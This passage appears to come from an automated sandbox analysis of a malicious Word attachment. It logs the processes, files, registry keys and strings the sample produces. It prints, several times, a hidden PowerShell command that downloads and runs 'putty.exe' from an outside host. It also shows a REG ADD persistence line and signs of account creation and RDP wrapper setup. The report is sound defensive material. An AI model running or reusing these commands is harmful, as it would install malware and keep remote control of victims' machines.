        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....."......0.................l.....&.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j....@#..............................}..v.....#......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j....0.l.............................}..v.....*......0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....@+..............................}..v.....+......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................l.....<.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....0..............................}..v....81......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......\..j....0.l.............................}..v.....4......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....5..............................}..v.....6......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.........).............p.................).....`I+........v.....................K2.....................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................].j....................................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...H.......0.................m.....6.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................].j....................................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}..v............0.................m.....".......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................].j....H...............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............^].j....@"m.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................].j....H...............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............^].j....@"m.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................].j....H...............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.p.u.t.t.y...e.x.e.'.........m.....J.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................].j....................................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............^].j....@"m.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................].j....x...............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w...............^].j....@"m.............................}..v....0.......0.......................f.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w................].j....................................}..v....h.......0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......^].j....@"m.............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................].j....................................}..v....0.......0.................m.............................
        Source: C:\Windows\SysWOW64\reg.exeConsole Write: ......................*.........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........%.....N....... .%.......%.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .[.V.e.r.s.i.o.n. .6...1...7.6.0.1.]...........!.....H.................4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....................................................6.0.1.]...........!.............x.........4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....................................................6.0.1.].................~.......x.........4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....................................................6.0.1.]...........!.......................4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: .................._.....................(.P.....................................................6.0.1.]...........!.......................4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: .................._.............C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........................6.0.1.]...........!.....(.......x.........4.....
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
        Source: C:\Users\user\AppData\Roaming\putty.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: images.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: images.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: images.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: images.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: images.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: images.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: NEW PO1100372954 -.docReversingLabs: Detection: 23%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
        Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
        Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: unknownProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32
        Source: C:\ProgramData\images.exeFile written: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: C:\Users\user\AppData\Roaming\putty.exeDirectory created: C:\Program Files\Microsoft DN1
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: System.Management.Automation.pdbBBfop source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, images.exe
        Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe
        Source: Binary string: wuser32.pdb source: images.exe
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2096511156.0000000002960000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2100589485.00000000029A0000.00000002.00000001.sdmp, putty.exe, 0000000A.00000002.2117131809.0000000000770000.00000002.00000001.sdmp

        Data Obfuscation:

        Suspicious powershell command line found
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_00207735 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002077E1 push cs; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002084E1 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_00206CC1 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_006A0E32 push 00000000h; retn 0010h
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00287735 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_002877E1 push cs; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_002884E1 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00286CC1 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_004011C0 push eax; ret
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_0041C225 pushad ; retn 0041h
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_004174D1 push ebp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_00417570 push ebp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_004011C0 push eax; ret
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_0041C225 pushad ; retn 0041h
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_004174D1 push ebp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_00417570 push ebp; retf
        Source: C:\ProgramData\images.exe Code function: 17_2_00147735 push esp; retf
        Source: C:\ProgramData\images.exe Code function: 17_2_00146CC1 push esp; retf
        Source: C:\ProgramData\images.exe Code function: 17_2_001477E1 push cs; retf
        Source: C:\ProgramData\images.exe Code function: 17_2_001484E1 push esp; retf
        Source: C:\ProgramData\images.exe Code function: 21_3_042A5220 push eax; ret
        Source: initial sample Static PE information: section name: .text entropy: 7.51033751288

        Persistence and Installation Behavior:

        Tries to download and execute files (via powershell)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,
